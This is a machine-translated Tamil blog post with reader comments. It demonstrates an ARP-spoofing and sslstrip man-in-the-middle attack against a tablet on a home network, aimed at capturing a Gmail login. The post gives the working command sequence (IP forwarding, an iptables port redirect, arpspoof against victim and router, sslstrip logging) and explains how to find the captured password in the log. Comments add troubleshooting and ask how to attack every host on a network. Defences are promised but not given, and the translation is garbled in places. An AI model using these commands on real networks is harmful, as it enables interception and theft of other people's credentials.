ArpSpoofing மற்றும் SSlstrip in Action.

வணக்கம் பதிவர்கள்.

நம்மில் பலர் விரும்பும் எந்தவொரு பாதுகாப்பற்ற நெட்வொர்க்குடனும் இணைக்கப்படுவது எவ்வளவு ஆபத்தானது என்பதற்கான ஒரு சிறிய மாதிரி இன்று என்னிடம் உள்ளது.

இன்று, நான் ஒரு ஜிமெயில் கடவுச்சொல்லைப் பெற Sslstrip உடன் ArpSpoofing ஐப் பயன்படுத்தப் போகிறேன். சூழலை மேலும் கட்டுப்படுத்த, நான் "என்ற கணக்கை உருவாக்கியுள்ளேன்testarp@gmail.com".

முன்னுரைகளை நான் மிகவும் விரும்பவில்லை என்பதால், வணிகத்திற்கு வருவோம்.

பின்வரும் தகவல்களால் அவர்கள் என்ன செய்ய முடியும் என்பதற்கு நான் எந்த நேரத்திலும் பொறுப்பல்ல. கல்வி நோக்கங்களுக்காக மட்டுமே இதைச் செய்கிறேன்

சுற்றுச்சூழல்

இந்த சோதனைக்கு நம்மிடம் இருப்பது பின்வருமாறு:

1. தாக்குபவர்: எனது டெஸ்க்டாப் அல்லது டெஸ்க்டாப் கம்ப்யூட்டர் தான் டெபியன் வீஸி. களஞ்சியங்களிலிருந்து நீங்கள் நிறுவலாம் sslstrip y dsniff பெற வேண்டும் ஆர்ப்ஸ்பூஃபிங்

2. பாதிக்கப்பட்டவர்: பாதிக்கப்பட்டவர் ஒரு Android டேப்லெட், அது உலாவியின் மூலம் தனது அஞ்சலை மட்டுமே பார்க்க விரும்புகிறது.

3. நடுத்தர: நடுத்தர என்னுடையது சிஸ்கோ டிபிசி 2425 திசைவி

முகவரிகள்.

தாக்குதல் முகவரி: 172.26.0.2

திசைவி முகவரி: 172.26.0.1

பாதிக்கப்பட்டவரின் முகவரி: 172.26.0.8

தாக்குதல்:

தாக்குதல் எவ்வாறு செயல்படுகிறது என்பதை இன்னும் கொஞ்சம் புரிந்துகொள்ள, நீங்கள் எனது பழைய இடத்திற்கு செல்லலாம் போஸ்ட்

இந்த தாக்குதலுக்கு நாங்கள் முதலில் செய்வோம், முன்னோக்கி செயல்படுத்துவதே, இதனால் எங்கள் கணினி பாதிக்கப்பட்டவருக்கு கவனிக்காமல் தகவல்களை அனுப்ப முடியும். (இல்லையெனில் அது சேவைகள் தாக்குதலை மறுக்கும்)

அதற்கு நாம் பயன்படுத்துவோம்:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

ஒவ்வொரு கட்டளையும் நேரடி கன்சோல் சாளரத்தில்.

இப்போது நாம் வால் -f செய்தால் desdelinux தகவல்களை நேரடியாகவும் நேரடியாகவும் பார்க்கிறோம்

ஸ்னாப்ஷாட் 1

அப்படியானால் நாம் விரும்புவதை எவ்வாறு பெறுவது?

முதலில் டேப்லெட்டில் எங்கள் அஞ்சலை உள்ளிடுவோம். உள்நுழையும்போது, ​​எங்கள் கன்சோலில் ஆயிரக்கணக்கான மற்றும் ஆயிரக்கணக்கான விஷயங்கள் தோன்றுவதைக் காண்கிறோம்.

இப்போது அது முடிந்ததும், எங்கள் கோப்பைத் திறப்போம் "desdelinux” நானோவுடன்

nano desdelinux

கட்டுப்பாடு + W உடன் SECURE POST எனப்படும் ஒன்றைத் தேடுகிறோம்.

இது போன்ற ஒன்றை நாம் பார்ப்போம்.

ஸ்னாப்ஷாட் 2

பார்க்க முடியாத அந்த பெரிய வரியில் பாதிக்கப்பட்டவரின் மின்னஞ்சல் மற்றும் கடவுச்சொல் உள்ளது.

எனவே சுரங்கப்பாதையின் முடிவில் ஒளியைக் காணும் வரை நாம் வலப்புறம் ஓடுகிறோம்.

ஸ்னாப்ஷாட் 3

இந்த தாக்குதல்களிலிருந்து நாம் எவ்வாறு நம்மை கொஞ்சம் பாதுகாத்துக் கொள்ள முடியும் என்பதை மற்றொரு சந்தர்ப்பத்தில் பார்ப்போம்.

மேற்கோளிடு


27 கருத்துகள், உங்களுடையதை விடுங்கள்

உங்கள் கருத்தை தெரிவிக்கவும்

உங்கள் மின்னஞ்சல் முகவரி வெளியிடப்பட்ட முடியாது. தேவையான புலங்கள் குறிக்கப்பட்டிருக்கும் *

*

*

  1. தரவுக்கு பொறுப்பு: மிகுவல் ஏஞ்சல் கேடன்
  2. தரவின் நோக்கம்: கட்டுப்பாட்டு ஸ்பேம், கருத்து மேலாண்மை.
  3. சட்டபூர்வமாக்கல்: உங்கள் ஒப்புதல்
  4. தரவின் தொடர்பு: சட்டபூர்வமான கடமையால் தவிர மூன்றாம் தரப்பினருக்கு தரவு தெரிவிக்கப்படாது.
  5. தரவு சேமிப்பு: ஆக்சென்டஸ் நெட்வொர்க்குகள் (EU) வழங்கிய தரவுத்தளம்
  6. உரிமைகள்: எந்த நேரத்திலும் உங்கள் தகவல்களை நீங்கள் கட்டுப்படுத்தலாம், மீட்டெடுக்கலாம் மற்றும் நீக்கலாம்.

  1.   @Jlcmux அவர் கூறினார்

    இடுகை வெளியிடப்பட்டபோது, ​​கட்டளைகள் சரியாக இல்லை என்று சொல்ல இந்த வாய்ப்பை நான் பயன்படுத்துகிறேன்.

    முடிவில் உள்ள iptables கட்டளை 8080 ஐ மற்றொரு வரியில் காணவில்லை. பின்னர் arpspoof கட்டளைகள் அனைத்தும் ஒரே வரியில் இருந்தன. ஒவ்வொரு கட்டளையும் வெவ்வேறு வரியில் இருக்கும்.

    ஆசிரியர் அதைப் பார்த்து அதை சரிசெய்ய முடியும் என்று நம்புகிறேன்.

    வாழ்த்துக்கள்.

    1.    மானுவல் டி லா ஃபியூண்டே அவர் கூறினார்

      நீங்கள் குறிப்பிட்டுள்ள திருத்தங்களை நான் செய்துள்ளேன், அது சரியா?

      நீங்கள் விருப்பமான உள்ளீட்டில் குறியீட்டைச் செருகப் போகிறீர்கள் என்றால், HTML காட்சியைப் பயன்படுத்தவும், நிலுவையில் உள்ளதற்கு அனுப்புவதற்கு முன்பு கட்டுரை சரியானது என்பதை சரிபார்க்கவும். நன்றி.

  2.   லூயிஸ் அவர் கூறினார்

    அறிவு இல்லாத நம்மில் உள்ளவர்கள் மிகவும் பாதிக்கப்படக்கூடியவர்கள் என்பதை அறிந்து கொள்வது சிலிர்க்க வைக்கிறது. மிகச் சிறிய தகவல்கள் நான் கொஞ்சம் கொஞ்சமாகப் புரிந்துகொள்ளும்போது கூட முக்கியத்துவத்தை உணர்கிறேன். நன்றி!
    மேற்கோளிடு

  3.   கிஸ்கார்ட் அவர் கூறினார்

    ஆனால் தாக்குபவரும் பாதிக்கப்பட்டவரும் ஒரே நெட்வொர்க்கில் இருந்தால் மட்டுமே அது செயல்படும். எப்படியிருந்தாலும், (அதே நெட்வொர்க்கில் இருப்பதால்) நீங்கள் HTTPS ஐப் பயன்படுத்தி இணைக்கிறீர்கள் என்றால் அது நடக்காது, ஏனெனில் உங்கள் கணினியை விட்டு வெளியேறுவதற்கு முன்பு தரவு குறியாக்கம் செய்யப்படுகிறது. நீங்கள் எச்.டி.டி.பி மூலம் இணைத்தால் (எஸ் இல்லாமல்) பிணைய கேபிளைப் பார்த்தால் கூட நீங்கள் விசைகளைப் பார்க்கிறீர்கள் என்று நினைக்கிறேன்.

    1.    @Jlcmux அவர் கூறினார்

      அது உண்மை இல்லை. நான் ஒரு ஜிமெயில் கடவுச்சொல்லை ஹேக்கிங் செய்கிறேன், ஜிமெயில் https ஐப் பயன்படுத்துவதை நீங்கள் கவனித்தால். அதனால்? புள்ளி என்னவென்றால், https பாதுகாப்பானது என்றாலும், அது http ஐப் பொறுத்தது. எனவே அது அவ்வளவு பாதுகாப்பானது அல்ல.

      ஒரு https பற்றி அதிகம் ஒப்புக் கொள்ளாதீர்கள், எஸ் என்பது சூப்பர்மேன் அல்ல, அது "பாதுகாப்பானது"

    2.    ஆர்டென் அவர் கூறினார்

      இது https உடன் அல்லது இல்லாமல் வேலை செய்கிறது, நான் இதை மிகவும் சிறப்பு வாய்ந்த லினக்ஸ் டிஸ்ட்ரோவுடன் முயற்சித்தேன், அது சிக்கல்கள் இல்லாமல் செயல்படுகிறது

    3.    மானுவல் டி லா ஃபியூண்டே அவர் கூறினார்

      உங்கள் வைஃபை திருடுவோருக்கு ஒரு பாடம் கற்பிக்க நீங்கள் இதை துல்லியமாக பயன்படுத்தலாம். 😀

      செமா அலோன்சோவின் வலைப்பதிவில் நீண்ட காலத்திற்கு முன்பு அவர்கள் கூறியது போலவே இது அதிகமாகவோ அல்லது குறைவாகவோ உள்ளது:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    ரேயோனன்ட் அவர் கூறினார்

        ஒஸ்டியா, அது என்ன செய்கிறது! / பின்னர் அவர்கள் வங்கிக் கணக்கைச் சரிபார்க்கச் செல்லும் போது நான் வி.பி.என் பயன்படுத்தும் ஒவ்வொரு முறையும் என் சித்தப்பிரமைக்குச் சொல்கிறார்கள் ...). கருத்துக்களில் இழிந்த மக்கள் எப்படி இருக்கிறார்கள் என்பதை நீங்கள் பார்க்க வேண்டும் ... இறுதியில் அது திருடுகிறது என்றால் ...

        1.    எலியோடைம் 3000 அவர் கூறினார்

          உங்கள் சொந்த VPN சேவையை எவ்வாறு உருவாக்குவது மற்றும் வழங்குவது என்பது குறித்த ஒரு டுடோரியலை இப்போது நாம் எடுக்க வேண்டும்.

      2.    டேனியல் அவர் கூறினார்

        நீங்கள் இணைக்கும் கதை மிகவும் சுவாரஸ்யமானது, இது ஒரு நாவல் புத்தகத்திற்கு கூட தகுதியானது என்று தோன்றுகிறது, மேலும் இது எனது அண்டை நாடுகளின் இணையத்தைப் பயன்படுத்தும்போது எனக்கு நினைவிருக்கிறது, மேலும் இந்த விஷயத்தை நான் அறிவேன் என்று கூறினாலும், ஆபத்தின் உண்மையான பரிமாணங்களை என்னால் ஒருபோதும் பார்க்க முடியாது என்று நினைக்கிறேன் கடைசியாக, அதிர்ஷ்டவசமாக எனக்கு, அவர்கள் கடவுச்சொல்லை WPA2 க்கு மட்டுமே மாற்றினர், அங்குதான் ISP உடனான எனது கதை ஹாஹா தொடங்கியது

    4.    மாரிசியோ அவர் கூறினார்

      அதனால்தான் தலைப்பு Sslstrip செயலில் உள்ளது என்று கூறுகிறது.

      தாக்குபவர் நடுவில் இருக்கும் வரை இது வேலை செய்யும்

  4.   உடனே அவர் கூறினார்

    ப்ரிஸில் நீங்கள் என்ன அலை வேலை செய்கிறீர்கள்? -.-
    இல்லை.
    உங்கள் கோரிக்கையை XD அனுப்ப நீங்கள் என்ன காத்திருக்கிறீர்கள்
    குறித்து
    நல்ல பதிவு

  5.   aroszx அவர் கூறினார்

    சுவாரஸ்யமானது, நான் பின்னர் ஒரு கல்வி சோதனை செய்வேன் ... ஒருவேளை நான் வைஃபைக்கு கடவுச்சொல்லை அகற்றிவிட்டு சிறிது வேடிக்கையாக இருக்கலாம்
    எந்தவொரு சந்தர்ப்பத்திலும், இலக்கு கோரப்பட்ட பக்கங்களுக்கு வெவ்வேறு பக்கங்களை அனுப்புவதற்கு ஒத்த ஏதாவது செய்ய முடியுமா? எடுத்துக்காட்டாக, அவர்கள் பேஸ்புக்கைத் திறக்க விரும்புகிறார்கள், நான் அவற்றை கூகிளுக்கு திருப்பி விடுகிறேன்? 😛

    1.    @Jlcmux அவர் கூறினார்

      ஆம். ஆனால் இது எல்லாம் மிகவும் வித்தியாசமான ரோல்.

      ஒருவேளை நான் அதை பின்னர் இடுகிறேன்.

  6.   கடைசியாக புதியவர் அவர் கூறினார்

    மிகச் சிறந்த இடுகை, இந்த தலைப்புகள் மிகவும் கல்விசார்ந்தவை, இப்போது நாம் இந்த தாக்குதலை எதிர்கொள்ள முடியும், ஏனெனில் சிலர் (என்னைப் போல) பொது நெட்வொர்க்குகளுடன் (எடுத்துக்காட்டாக பல்கலைக்கழகம்) இணைப்பதால் அதைத் தவிர்ப்பது உதவியாக இருக்கும்.

    நன்றி!

  7.   மற்றொரு-டி.எல்-பயனர் அவர் கூறினார்

    இது எனக்கு வேலை செய்யவில்லை

  8.   வோக்கர் அவர் கூறினார்

    ஒரு சேவையக சான்றிதழ் மூலம் https இணைப்புகள் குறியாக்கம் செய்யப்பட்டுள்ளன என்பதைத் தவிர (இங்கே உங்கள் கணினியில் சான்றிதழ் கிடைத்ததும், உங்கள் உலாவி குறியாக்கத்தின் பொறுப்பில் உள்ளது) ஐபிடேபிள்களுடன் நீங்கள் போர்ட் 80 (http) ஐ திருப்பி விடுகிறீர்கள். , 443 அல்ல, இது https

    1.    @Jlcmux அவர் கூறினார்

      அதையும் நினைத்தேன். புள்ளி என்னவென்றால், https "பாதுகாப்பானது" என்றாலும் அது துரதிர்ஷ்டவசமாக http ஐப் பொறுத்தது. எனவே sslstrip அதைப் பயன்படுத்திக் கொள்கிறது, இது https நற்சான்றுகளைப் பயன்படுத்துகிறது என்று உலாவி நம்ப வைக்கிறது, ஆனால் அது இல்லை.

      1.    வோக்கர் அவர் கூறினார்

        புனித மலம்! ஆனால் உலாவி "இந்த சான்றிதழ் சந்தேகத்திற்கிடமான தளத்திலிருந்து வந்தது அல்லது அது போன்ற ஏதாவது" போன்ற எச்சரிக்கையைப் பார்க்க வேண்டும் ... நான் நிச்சயமாக XD சோதனைகளைச் செய்ய வேண்டியிருக்கும்

        1.    @Jlcmux அவர் கூறினார்

          இல்லை, முற்றிலும் எதுவும் வெளியே வரவில்லை.

  9.   மற்றொரு-டி.எல்-பயனர் அவர் கூறினார்

    இது இறுதியாக எனக்கு வேலை செய்தது
    கடவுச்சொல்லுடன் நான் ஒரு WEP நெட்வொர்க்கில் இணைக்கப்பட்டுள்ளேன், அது எப்படியும் கடவுச்சொல்லை நேரடியாக எனக்குக் காட்டியது.

    ஒரு கேள்வி. ஒரே நடைமுறையை நீங்கள் செய்ய முடியுமா, ஆனால் ஒரு பாதிக்கப்பட்டவருக்குப் பதிலாக, பிணையத்துடன் இணைக்கப்பட்ட அனைத்து கணினிகளுக்கும்?

    1.    @Jlcmux அவர் கூறினார்

      ஆமாம் உன்னால் முடியும். ஆனால் நான் சோதனைகள் செய்யவில்லை. அதை நீங்களே முயற்சி செய்து, அது எவ்வாறு செல்கிறது என்பதை எங்களிடம் கூறுங்கள்.

  10.   சின்னிக் 19 அவர் கூறினார்

    இதனுடன் நான் பெறும் ஒரே விஷயம் என்னவென்றால், பாதிக்கப்பட்டவரின் இயந்திரம் ஆஃப்லைனில் செல்கிறது, ஆனால் எஸ்.எஸ்.எல்ஸ்டிரிப் எனக்கு எதையும் காட்டவில்லை: /

    1.    @Jlcmux அவர் கூறினார்

      நீங்கள் ஒரு கணம் ஃபயர்வாலை முடக்க வேண்டும். அல்லது குறைந்த பட்சம் உள்வரும் இணைப்புகளை இயக்கவும்.

  11.   திரு பிளாக் அவர் கூறினார்

    ஃபேஸ்புக் பக்கத்தின் பயனர்பெயர் மற்றும் கடவுச்சொல்லை மட்டுமே ஆய்வு மற்றும் என்னால் பார்க்க முடிந்தது, ஜிமெயிலில் பதிவில் எந்த முடிவுகளையும் நான் காணவில்லை, மேலும் எனக்கு ஆர்ப்ஸ்பூஃப் «arpspoof -i -t of ஒரு வரி மட்டுமே தேவைப்பட்டது. மறுபுறம், பாதிக்கப்பட்ட இயந்திரத்தால் சில பக்கங்களைத் திறக்க முடியவில்லை. நான் தொடர்ந்து விசாரிப்பேன், இது மிகவும் சுவாரஸ்யமானது. மஞ்சாரோவைப் பயன்படுத்துபவர்களுக்கு ஒரு உதவி, நிறுவ வேண்டிய தொகுப்புகள்: dsniff (இங்கே arpspoff), முறுக்கப்பட்ட மற்றும் python2-pyopenssl. Sslstrip ஐ இங்கிருந்து பதிவிறக்கம் செய்யலாம்: http://www.thoughtcrime.org/software/sslstrip/
    இதை இயக்க $ python2 sslstrip.py
    வாழ்த்துக்கள்.

  12.   திரு பிளாக் அவர் கூறினார்

    இது வெளியே வரவில்லை, ஆனால் ஆர்ஸ்பூஃப் வரி: #arpspoof -i int -t ip-victim ip-router

  13.   கில்பர்ட் அவர் கூறினார்

    பாருங்கள் நீங்கள் சொல்வதை நான் சரியாக செய்கிறேன்:

    எதிரொலி "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –Destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    பிரச்சனை என்னவென்றால், என் அறையில் நான் வைத்திருக்கும் மற்றொரு பி.சி., பாதிக்கப்பட்டவருக்கு, நான் திசைவியை மறுதொடக்கம் செய்ய வேண்டும் என்பதற்கு எனக்கு எந்த தொடர்பும் இல்லை, நான் என்ன செய்ய முடியும்.

    இன்னொரு விஷயம், நான் ஒரு மெய்நிகர் கணினியுடன் பணிபுரிகிறேன், நான் iwconfig கட்டளையை இயக்கும்போது, ​​wlan0 தோன்றாது, அல்லது ifconfig ஐ இயக்கும்போது, ​​எனினும், எனது மெய்நிகர் கணினியில் இணையம் இருந்தால், ஒரு eth0 இடைமுகத்துடன் என்ன.